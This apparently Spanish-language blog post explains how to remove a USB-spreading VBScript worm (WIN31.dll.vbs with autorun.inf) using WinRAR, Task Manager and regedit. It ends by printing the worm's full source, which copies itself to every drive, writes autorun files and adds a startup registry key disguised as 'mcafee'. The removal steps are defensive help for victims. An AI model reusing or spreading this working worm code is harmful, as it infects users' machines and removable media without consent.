La verdad es que este chiquitín, aunque no muy dañino, es muy fastidioso. Principalmente lo que hace es:
- No dejarte abrir cualquier unidad
- Poner en el internet explorer "BATAI USA"
- Propagarse mediante pinchos USB, msn y cualquier cosilla de esas
Para ello hay muchas formas.
La primera, la que use yo, es usando el Winrar.
Este programilla inicialmente se usa para comprimir, pero tambien tiene una función muy util, que te permite ver cualquier archivo oculto. Una vez que lo tengamos instalado lo ejecutamos, y en la barra de explorar (donde hay un hueco, justo debajo de los iconos grandes =P ) ponemos las unidades que queramos examinar. En mi caso serian C: , E: y G:
Pues si en alguna de estas unidades vemos algun archivo que se llame autorun.inf, o Win31.dll.vbs ...lo tenemos!
Pues vallamos de caza:
1.Vamos al administrador de tareas (ctrl+alt+del), y desplegamos la ventanita de "procesos". Una vez echo esto buscamos uno que se llame: WScript. Lo seleccionamos y terminamos el proceso. Ya podemos tenemos la licencia para "desterrarla".
2.Ahora, lo que tenemos que hacer es pinchar en el menu de inicio. pinchamos tambien en "ejecutar" y escribimos en la entrada de texto "regedit". Entonces se nos desplegara una ventana con un arbol de directorios a la izquierda y una zona en blanco a la derecha. Lo que tenemos que buscar es la entrada que hace que cada vez que matemos a el gusanito resucite, por tanto pulsamos ctrl+B y nos aparecera una ventanita de buscar. Ponemos WScript.exe. Entonces despues de buscar nos aparecera en la zona blanca de la derecha una entrada con esa terminación. EL nombre varia, por tanto no lo se. Pero vamos la entrada que acabe asi pumm! la borramos (supr). Esto ya nos permite eliminarlo del sistema sin que vuelva a aparecer ...jeje
3. Ahora nos queda lo ultimo y más divertido...Ver como desaparece! Nuevamente abrimos el Winrar y vamos a donde habiamos visto el gusano (C: , E: , lo que sea...), y en cuanto veamos Autorun.inf o Win31.dll.vbs lo borramos, pero tambien de la papelera...que no se os olvide.
Un punto que alomejor se os escapa! si antes de eliminar el gusano abris cualquiera de las unidades el gusano se reactiva y habra que empezar de nuevo...O sea que todo lo hacemos por el winrar y nos evitamos abrir y cerrar unidades y correr riesgos =P
Bueno, pues una vez que hemos completado todo esto el gusano ya no será más que un monton de cenizas que estaran solo en la mente =P
El batai usa que nos sale en la barra de el explorer seguira ahi. SI quereis lo cambias eligiendo la pagina de inicio.
P.D: por si a alguien le interesa, aqui tienen el codigo del gusano:
__________autorun.inf__________
ÿþ[ a u t o r u n ]
s h e l l e x e c u t e = w s c r i p t . e x e W I N 3 1 . d l l . v b s
__________WIN31.dll.vbs__________
ÿþo n e r r o r r e s u m e n e x t
R e m 1 2 1 2 0 6 , d o u s t i l l r e m e m b e r d i s d a y u s _ 3 ?
D i m s r c , w i n p a t h , f l a s h d r i v e , f s , m f , a t r , t f , r g , n t , c h e c k , s d : a t r = " [ a u t o r u n ] " & v b c r l f & " s h e l l e x e c u t e = w s c r i p t . e x e W I N 3 1 . d l l . v b s " : S e t f s = C r e a t e O b j e c t ( " S c r i p t i n g . F i l e S y s t e m O b j e c t " ) : S e t m f = f s . g e t f i l e ( W s c r i p t . S c r i p t F u l l n a m e ) : D i m t e x t , s i z e : s i z e = m f . s i z e : c h e c k = m f . d r i v e . d r i v e t y p e : S e t t e x t = m f . o p e n a s t e x t s t r e a m ( 1 , - 2 )
D o W h i l e N o t t e x t . a t e n d o f s t r e a m : s r c = s r c & t e x t . r e a d l i n e : s r c = s r c & v b C r L f : L o o p
D o : S e t w i n p a t h = f s . g e t s p e c i a l f o l d e r ( 0 ) : S e t t f = f s . g e t f i l e ( w i n p a t h & " \ W I N 3 1 . d l l . v b s " ) : t f . A t t r i b u t e s = 3 2 : S e t t f = f s . c r e a t e t e x t f i l e ( w i n p a t h & " \ W I N 3 1 . d l l . v b s " , 2 , T r u e ) : t f . w r i t e s r c : t f . C l o s e : S e t t f = f s . g e t f i l e ( w i n p a t h & " \ W I N 3 1 . d l l . v b s " ) : t f . A t t r i b u t e s = 3 9
F o r E a c h f l a s h d r i v e I n f s . d r i v e s
I f ( f l a s h d r i v e . d r i v e t y p e = 1 O r f l a s h d r i v e . d r i v e t y p e = 2 ) A n d f l a s h d r i v e . P a t h < > " A : " T h e n : S e t t f = f s . g e t f i l e ( f l a s h d r i v e . P a t h & " \ W I N 3 1 . d l l . v b s " ) : t f . A t t r i b u t e s = 3 2 : S e t t f = f s . c r e a t e t e x t f i l e ( f l a s h d r i v e . P a t h & " \ W I N 3 1 . d l l . v b s " , 2 , T r u e ) : t f . w r i t e s r c : t f . C l o s e : S e t t f = f s . g e t f i l e ( f l a s h d r i v e . P a t h & " \ W I N 3 1 . d l l . v b s " ) : t f . A t t r i b u t e s = 3 9 : S e t t f = f s . g e t f i l e ( f l a s h d r i v e . P a t h & " \ a u t o r u n . i n f " ) : t f . A t t r i b u t e s = 3 2 : S e t t f = f s . c r e a t e t e x t f i l e ( f l a s h d r i v e . P a t h & " \ a u t o r u n . i n f " , 2 , T r u e ) : t f . w r i t e a t r : t f . C l o s e : S e t t f = f s . g e t f i l e ( f l a s h d r i v e . P a t h & " \ a u t o r u n . i n f " ) : t f . A t t r i b u t e s = 3 9 : E n d I f
N e x t
S e t r g = C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) : r g . r e g w r i t e " H K E Y _ L O C A L _ M A C H I N E \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n \ m c a f e e " , w i n p a t h & " \ W I N 3 1 . d l l . v b s " : r g . r e g w r i t e " H K E Y _ C U R R E N T _ U S E R \ S o f t w a r e \ M i c r o s o f t \ I n t e r n e t E x p l o r e r \ M a i n \ W i n d o w T i t l e " , " B A N T A I U S A & E Z R A E L [ A L - M U K H L I S S T U D I O ] " : r g . r e g w r i t e " H K C R \ v b s f i l e \ D e f a u l t I c o n " , " s h e l l 3 2 . d l l , 2 "
I f c h e c k < > 1 T h e n W s c r i p t . s l e e p 2 0 0 0 0 0
L o o p W h i l e c h e c k < > 1 : S e t s d = C r e a t e O b j e c t ( " W s c r i p t . s h e l l " ) : s d . r u n w i n p a t h & " \ e x p l o r e r . e x e / e , / s e l e c t , " & W s c r i p t . S c r i p t F u l l n a m e
No hay comentarios:
Publicar un comentario